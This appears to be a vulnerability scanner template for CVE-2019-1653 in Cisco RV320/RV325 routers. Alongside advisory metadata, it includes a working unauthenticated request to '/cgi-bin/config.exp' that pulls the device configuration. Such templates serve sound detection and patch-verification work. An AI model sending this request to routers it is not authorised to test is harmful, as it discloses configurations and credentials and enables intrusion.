id: CVE-2019-1653 info: name: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure author: dwisiswant0 severity: high description: | Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info - https://www.exploit-db.com/exploits/46262/ - https://www.exploit-db.com/exploits/46655/ - https://nvd.nist.gov/vuln/detail/CVE-2019-1653 remediation: | Cisco has released firmware updates that address this vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-1653 cwe-id: CWE-200 tags: kev,edb,cve,cve2019,cisco,router,exposure requests: - method: GET path: - "{{BaseURL}}/cgi-bin/config.exp" matchers-condition: and matchers: - type: word part: body words: - "sysconfig" - type: status status: - 200 # Enhanced by mp on 2022/06/14